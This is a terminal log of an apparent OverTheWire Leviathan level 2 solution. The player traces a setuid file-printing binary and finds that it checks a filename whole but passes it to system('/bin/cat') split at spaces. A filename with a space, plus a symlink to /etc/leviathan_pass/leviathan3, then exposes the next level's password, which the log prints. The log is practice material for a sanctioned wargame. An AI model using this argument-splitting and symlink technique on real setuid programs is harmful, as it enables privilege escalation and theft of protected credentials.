**ssh leviathan.labs.overthewire.org -l leviathan2 -p 2223
                   _            _       _   _
                  | | _____   _(_) __ _| |_| |__   __ _ _ __
                  | |/ _ \ \ / / |/ _` | __| '_ \ / _` | '_ \
                  | |  __/\ V /| | (_| | |_| | | | (_| | | | |
                  |_|\___| \_/ |_|\__,_|\__|_| |_|\__,_|_| |_|


                      This is an OverTheWire game server.
            More information on http://www.overthewire.org/wargames

leviathan2@leviathan.labs.overthewire.org's password:

      ,----..            ,----,          .---.
     /   /   \         ,/   .`|         /. ./|
    /   .     :      ,`   .'  :     .--'.  ' ;
   .   /   ;.  \   ;    ;     /    /__./ \ : |
  .   ;   /  ` ; .'___,/    ,' .--'.  '   \' .
  ;   |  ; \ ; | |    :     | /___/ \ |    ' '
  |   :  | ; | ' ;    |.';  ; ;   \  \;      :
  .   |  ' ' ' : `----'  |  |  \   ;  `      |
  '   ;  \; /  |     '   :  ;   .   \    .\  ;
   \   \  ',  /      |   |  '    \   \   ' \ |
    ;   :    /       '   :  |     :   '  |--"
     \   \ .'        ;   |.'       \   \ ;
  www. `---` ver     '---' he       '---" ire.org


Welcome to OverTheWire!

If you find any problems, please report them to the #wargames channel on
discord or IRC.

--[ Playing the games ]--

  This machine might hold several wargames.
  If you are playing "somegame", then:

    * USERNAMES are somegame0, somegame1, ...
    * Most LEVELS are stored in /somegame/.
    * PASSWORDS for each level are stored in /etc/somegame_pass/.

  Write-access to homedirectories is disabled. It is advised to create a
  working directory with a hard-to-guess name in /tmp/.  You can use the
  command "mktemp -d" in order to generate a random and hard to guess
  directory in /tmp/.  Read-access to both /tmp/ is disabled and to /proc
  restricted so that users cannot snoop on eachother. Files and directories
  with easily guessable or short names will be periodically deleted! The /tmp
  directory is regularly wiped.
  Please play nice:

    * don't leave orphan processes running
    * don't leave exploit-files laying around
    * don't annoy other players
    * don't post passwords or spoilers
    * again, DONT POST SPOILERS!
      This includes writeups of your solution on your blog or website!

--[ Tips ]--

  This machine has a 64bit processor and many security-features enabled
  by default, although ASLR has been switched off.  The following
  compiler flags might be interesting:

    -m32                    compile for 32bit
    -fno-stack-protector    disable ProPolice
    -Wl,-z,norelro          disable relro

  In addition, the execstack tool can be used to flag the stack as
  executable on ELF binaries.

  Finally, network-access is limited for most levels by a local
  firewall.

--[ Tools ]--

 For your convenience we have installed a few useful tools which you can find
 in the following locations:

    * gef (https://github.com/hugsy/gef) in /opt/gef/
    * pwndbg (https://github.com/pwndbg/pwndbg) in /opt/pwndbg/
    * peda (https://github.com/longld/peda.git) in /opt/peda/
    * gdbinit (https://github.com/gdbinit/Gdbinit) in /opt/gdbinit/
    * pwntools (https://github.com/Gallopsled/pwntools)
    * radare2 (http://www.radare.org/)

 Both python2 and python3 are installed.

--[ More information ]--

  For more information regarding individual wargames, visit
  http://www.overthewire.org/wargames/

  For support, questions or comments, contact us on discord or IRC.

  Enjoy your stay!

leviathan2@gibson:~$ ls -la
total 36
drwxr-xr-x  2 root       root        4096 Apr 23 18:04 .
drwxr-xr-x 83 root       root        4096 Apr 23 18:06 ..
-rw-r--r--  1 root       root         220 Jan  6  2022 .bash_logout
-rw-r--r--  1 root       root        3771 Jan  6  2022 .bashrc
-r-sr-x---  1 leviathan3 leviathan2 15060 Apr 23 18:04 printfile
-rw-r--r--  1 root       root         807 Jan  6  2022 .profile
leviathan2@gibson:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename
leviathan2@gibson:~$ ltrace ./printfile
__libc_start_main(0x80491e6, 1, 0xffffd5f4, 0 <unfinished ...>
puts("*** File Printer ***"*** File Printer ***
)           = 21
printf("Usage: %s filename\n", "./printfile"Usage: ./printfile filename
) = 28
+++ exited (status 255) +++
leviathan2@gibson:~$ ltrace ./printfile .bash_logout
__libc_start_main(0x80491e6, 2, 0xffffd5e4, 0 <unfinished ...>
access(".bash_logout", 4)              = 0
snprintf("/bin/cat .bash_logout", 511, "/bin/cat %s", ".bash_logout") = 21
geteuid()                              = 12002
geteuid()                              = 12002
setreuid(12002, 12002)                 = 0
system("/bin/cat .bash_logout"# ~/.bash_logout: executed by bash(1) when login shell exits.

# when leaving the console clear the screen to increase privacy

if [ "$SHLVL" = 1 ]; then
    [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
fi
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                 = 0
+++ exited (status 0) +++
leviathan2@gibson:~$ mktemp -d
/tmp/tmp.a8DVl3e8vr
leviathan2@gibson:~$ touch /tmp/tmp.a8DVL3e8vr/"test file.txt"
touch: cannot touch '/tmp/tmp.a8DVL3e8vr/test file.txt': No such file or directory
leviathan2@gibson:~$ touch /tmp/tmp.a8DVl3e8vr/"test file.txt"
leviathan2@gibson:~$ ls -la /tmp/tmp.a8DVl3e8vr
total 268
drwx------    2 leviathan2 leviathan2   4096 May 29 18:29 .
drwxrwx-wt 6703 root       root       266240 May 29 18:30 ..
-rw-rw-r--    1 leviathan2 leviathan2      0 May 29 18:29 test file.txt
leviathan2@gibson:~$ ltrace .printfile /tmp/tmp.a8DVl3e8vr/"test file.txt"
leviathan2@gibson:~$ ltrace ./printfile /tmp/tmp.a8DVl3e8vr/"tes
t file.txt"
__libc_start_main(0x80491e6, 2, 0xffffd5d4, 0 <unfinished ...>
access("/tmp/tmp.a8DVl3e8vr/test file.tx"..., 4) = 0
snprintf("/bin/cat /tmp/tmp.a8DVl3e8vr/tes"..., 511, "/bin/cat %s", "/tmp/tmp.a8DVl3e8vr/test file.tx"...) = 42
geteuid()                              = 12002
geteuid()                              = 12002
setreuid(12002, 12002)                 = 0
system("/bin/cat /tmp/tmp.a8DVl3e8vr/tes".../bin/cat: /tmp/tmp.a8DVl3e8vr/test: No such file or directory
/bin/cat: file.txt: No such file or directory
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                 = 256
+++ exited (status 0) +++
leviathan2@gibson:~$ ln -s /etc/leviathan_pass/leviathan3 /tmp/tmp.a8DVl3e8vr/test
leviathan2@gibson:~$ ls -la /tmp/tmp.a8DVl3e8vr
total 268
drwx------    2 leviathan2 leviathan2   4096 May 29 18:34 .
drwxrwx-wt 6704 root       root       266240 May 29 18:34 ..
lrwxrwxrwx    1 leviathan2 leviathan2     30 May 29 18:34 test -> /etc/leviathan_pass/leviathan3
-rw-rw-r--    1 leviathan2 leviathan2      0 May 29 18:29 test file.txt
leviathan2@gibson:~$ chmod 777 /tmp/tmp.a8DVl3e8vr
leviathan2@gibson:~$ ./printfile /tmp/tmp.a8DVl3e8vr/"test file.
txt"
Q0G8j4sakn
/bin/cat: file.txt: No such file or directory
leviathan2@gibson:~$ exit
logout
Connection to leviathan.labs.overthewire.org closed.**
